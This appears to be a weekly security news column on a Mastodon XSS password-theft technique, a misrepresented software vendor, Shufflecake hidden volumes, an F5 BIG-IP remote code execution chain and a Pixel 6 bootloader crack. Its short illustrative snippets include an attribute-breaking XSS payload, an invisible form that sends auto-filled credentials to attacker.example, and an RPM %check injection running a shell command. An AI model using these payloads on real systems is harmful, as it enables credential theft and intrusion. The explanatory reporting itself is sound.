This Week In Security: Mastodon, Fake Software Company, And Shufflecake

Due to Twitter’s new policy of testing new features in production, interest in Mastodon as a potential replacement has skyrocketed. And what’s not to love? You can host it yourself, it’s part of the Fediverse, and you can even run one of the experimental forks for more features. But there’s also danger in putting a service on the internet, as [Gareth Heyes] illustrates by, ironically, stealing passwords from a Mastodon instance.

Every service that lets one user input text and then shows that text to other users has to be hardened against cross-site scripting (XSS), the attack where HTML or JavaScript is injected into another user’s experience. Usually this hardening is done with a filter that sanitizes user input. Two things can trip such a filter up: the HTML elements it chooses to allow, and special parsing features. In this case, the special feature was the tongue-in-cheek “verified” icon that users could add to their display name by including a :verified: tag.

Mastodon replaces that tag with an HTML img block, which includes double quotes, to display the icon. It gets interesting when the icon lands inside a user-supplied HTML attribute, like an <abbr title=""> tag. The double quotes of your abbr markup mismatch with the double quotes introduced by the verified icon, and you can suddenly inject all sorts of fun code. The door isn’t wide open, though, as Mastodon has a well-written Content Security Policy (CSP). It allows iframes, but other content cannot be loaded from outside domains. This defeats many of the usual attacks, but [Gareth] had a trick up his sleeve: invisible forms.
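To picture the quote mismatch, here’s a minimal Python sketch of the bug class. This is emphatically not Mastodon’s actual code; the function names, emoji path, and payload are all invented for illustration:

```python
# Hypothetical sketch: an emoji shortcode is expanded *after* sanitization,
# inside an attribute value, injecting fresh double quotes.
VERIFIED_IMG = '<img src="/emoji/verified.svg" alt="verified">'

def render_display_name(name: str) -> str:
    # The sanitizer ran earlier and saw only the harmless `:verified:` text;
    # this naive replacement then introduces new quote characters.
    return name.replace(":verified:", VERIFIED_IMG)

# The display name ends up inside a user-supplied attribute such as
# <abbr title="...">, so the injected quotes close the attribute early.
name = ':verified: onmouseover=alert(1) x='
html = '<abbr title="{}">hello</abbr>'.format(render_display_name(name))
print(html)
```

Because the shortcode is expanded after sanitization, the quotes from the img block terminate the title attribute early, and the attacker’s `onmouseover=alert(1)` text is promoted to live markup.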

Password managers, like the one built into Chrome, are pretty aggressive about auto-filling forms, and there isn’t a check for whether those forms are visible. The only catch was how to submit the form. That has to be a user-initiated action. The solution here is to spoof a second message, and fake the toolbar between messages. It’s not a perfect 0-click exploit, but the results are pretty convincing.
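As a rough illustration of the invisible-form trick (the markup below is invented, and attacker.example is a placeholder), the form a password manager auto-fills can be styled so the user never sees it:

```python
# An invisible login form, sketched as a Python string. CSS hides it from
# the user, but a password manager that skips visibility checks will still
# auto-fill the username and password fields once the form is in the DOM.
hidden_form = (
    '<form action="https://attacker.example/steal" method="post" '
    'style="opacity:0;position:absolute;left:-9999px">'
    '<input name="username" autocomplete="username">'
    '<input name="password" type="password" autocomplete="current-password">'
    '<button type="submit">reply</button>'
    '</form>'
)
```

The remaining work, as described above, is social engineering: making the submit action look like an ordinary part of the UI so the victim clicks it.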

[Gareth] reported the flaw to both Mastodon and the Glitch fork, and both have issued patches to mitigate elements of this attack, although core Mastodon was never actually vulnerable, since it doesn’t allow the <abbr title=""> attribute in the first place.


It’s pretty common for a company to be registered in one place and physically do business in another. In the US, Delaware is a popular choice for filing articles of incorporation. This is, by the way, why the Twitter vs Musk court case happened in the Delaware Court of Chancery: Twitter is a Delaware company. What’s less kosher is a company that is based in one country but claims to be based in another, without a paper trail disclosing the arrangement. And that seems to be exactly what Pushwoosh is up to.

This would be a relatively uninteresting story, except for the fact that Pushwoosh appears to actually be based in Russia, and has taken contracts to do DoD work. It appears that some data handling happens on Pushwoosh servers, including the collection of geolocation data. It’s not clear that anything malicious was going on, but this isn’t a risk the US Government is willing to take.

Shufflecake Brings the Deniability

Remember Truecrypt? It was disk encryption software with some fancy extra features, like hidden volumes for plausible deniability. You could set up an encrypted volume that would show one set of files when given one password, and a different set with another. Development on Truecrypt was abandoned years ago, in a weird turn of events. There’s now a new project looking to fill the plausible deniability gap: Shufflecake.

It’s open source, runs as a Linux kernel module plus a userspace tool, and supports nested hidden volumes up to 15 deep. An encrypted volume is stored in unused block device space and is completely indistinguishable from random bits on the disk. The plausible deniability bit comes in when decrypting and mounting: you can decrypt just the outer volume with one password, and it’s impossible to tell whether any additional volumes exist until a valid password is given.
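A toy model shows why that is deniable. This is emphatically not Shufflecake’s real on-disk format (a toy XOR keystream stands in for a proper KDF plus authenticated encryption, and the MAGIC marker is invented), but it captures the core idea: an encrypted header and random noise look identical without the right password.

```python
from hashlib import shake_256
from secrets import token_bytes
from typing import Optional

MAGIC = b"SHUF"  # toy marker; a real format avoids plaintext magic values

def keystream(password: str, n: int) -> bytes:
    # Toy keystream from SHAKE-256; a real design uses a proper KDF + AEAD.
    return shake_256(password.encode()).digest(n)

def make_slot(password: Optional[str]) -> bytes:
    if password is None:
        return token_bytes(len(MAGIC))  # decoy slot: pure random noise
    ks = keystream(password, len(MAGIC))
    return bytes(a ^ b for a, b in zip(MAGIC, ks))  # encrypted header

def try_open(slot: bytes, password: str) -> bool:
    ks = keystream(password, len(slot))
    return bytes(a ^ b for a, b in zip(slot, ks)) == MAGIC

# One outer volume, one hidden volume, one slot of plain noise.
slots = [make_slot("outer-pw"), make_slot("hidden-pw"), make_slot(None)]
print([try_open(s, "outer-pw") for s in slots])
```

Handing over the outer password opens only the first slot; the other slots still read as noise, so the hidden volume’s very existence stays deniable.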


[Ron Bowes] at Rapid7 has some fun research that achieves Remote Code Execution on F5 BIG-IP and BIG-IQ devices. These are powerful network devices doing traffic shaping at ISP scale, and they run CentOS under the hood. Kudos to F5 for getting a lot right, like leaving SELinux enabled, which apparently made exploitation much more difficult. The problem is an API endpoint that lacks Cross-Site Request Forgery (CSRF) protections, meaning it can be called by a script running on any webpage the victim visits. The attack is to trick an admin into loading such a page, which then rides the admin’s existing session cookie to call the API.
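The missing server-side check can be sketched in a few lines of Python (hypothetical, not F5’s code): the browser attaches the session cookie to cross-site requests automatically, so a valid cookie alone proves nothing, while a token bound to the session is something the attacker’s page cannot compute.

```python
import hashlib
import hmac
import secrets

SERVER_SECRET = secrets.token_bytes(32)

def csrf_token(session_id: str) -> str:
    # Token bound to the session. A script on an attacker's page can make
    # the victim's browser send the cookie, but cannot derive this value.
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()

def api_call_allowed(session_ok: bool, token: str, session_id: str) -> bool:
    # The vulnerable endpoint effectively stopped at `session_ok`;
    # the fix is to also demand a matching per-session token.
    return session_ok and hmac.compare_digest(token, csrf_token(session_id))

sid = "admin-session"
print(api_call_allowed(True, csrf_token(sid), sid))  # legitimate request
print(api_call_allowed(True, "", sid))               # forged cross-site request
```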

To pivot into code execution, an RPM specification generator is abused, and a %check section is injected. In legitimate RPM packages, %check runs the package’s test suite at build time, but here it’s used to launch a webshell. A few other weaknesses are chained together to reach root-level access. The research was reported to F5, and fixes went out this week.
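The injection itself is the classic template problem, sketched here in Python; the template and payload below are invented, not F5’s actual generator:

```python
# Hypothetical sketch of spec-file injection: a user-controlled field is
# interpolated into a generated RPM .spec, and a crafted value smuggles
# in a %check section whose commands run during the package build.
SPEC_TEMPLATE = "Name: {name}\nVersion: 1.0\nSummary: generated package\n"

benign = SPEC_TEMPLATE.format(name="demo")
malicious = SPEC_TEMPLATE.format(
    name="demo\n\n%check\nbash -c 'id > /tmp/pwned'"  # injected section
)
print("%check" in benign, "%check" in malicious)
```

Because the interpolated value can contain newlines, the attacker controls whole lines of the spec file, which is enough to introduce an entirely new section.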

Pixel 6 Part Three

We covered part one and part two of this story, but to complete the circle, part three is now available in the tale of how the Pixel 6 bootloader was cracked. The first hurdle was finding a section of memory marked readable, writable, and executable. Getting shellcode to actually execute in this environment is a bit of a challenge, but the right makefile wizardry generates the needed code. The set of three posts is a great primer on how to go about breaking Android bootloaders.
